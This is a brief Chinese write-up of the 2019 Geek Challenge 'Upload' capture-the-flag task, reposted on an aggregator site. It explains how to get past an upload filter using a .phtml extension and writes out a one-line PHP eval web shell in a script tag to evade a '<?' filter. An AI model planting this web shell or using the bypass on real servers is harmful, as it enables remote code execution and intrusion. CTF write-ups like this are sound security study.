极客大挑战 2019 Upload

Posted 2021-06-18 H3rmesk1t

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了极客大挑战 2019 Upload相关的知识，希望对你有一定的参考价值。

极客大挑战 2019 Upload

考点
思路
Payload

考点

phtml绕过后缀、script绕过<?

思路

先试试传个php，发现不得行！！！
抓个包挨个尝试发现phtml可以成功，但是显示<?被过滤了，尝试使用<ScrIpt language="php">@eval($_POST['cmd'])</ScrIpt>来绕过，上传成功后骑上我们的马儿~

Payload

在这里插入图片描述

以上是关于极客大挑战 2019 Upload的主要内容，如果未能解决你的问题，请参考以下文章

BUUCTF[极客大挑战2019]Upload

BUU-WEB-[极客大挑战 2019]Upload

[极客大挑战 2019]Upload

(文件上传upload) [极客大挑战 2019]Upload1 和 [ACTF2020新生赛]Upload1

Buuctf-web-[极客大挑战 2019]Upload

[HCTF 2018]WarmUp&[极客大挑战 2019]Knife&[极客大挑战 2019]Secret File&[极客大挑战 2019]BuyFlag